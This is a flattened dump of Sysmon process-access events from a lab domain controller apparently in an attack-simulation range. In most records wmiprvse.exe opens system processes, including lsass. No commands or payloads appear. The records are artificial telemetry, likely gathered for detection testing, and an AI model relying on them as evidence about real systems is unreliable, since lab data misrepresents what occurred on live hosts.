16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6DAA-00000000AD01}25368712C:\Windows\system32\conhost.exe{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.622{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.622{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.622{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.622{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.606{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D63-603E-6DAA-00000000AD01}2536C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.606{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.606{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.606{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.606{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.606{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 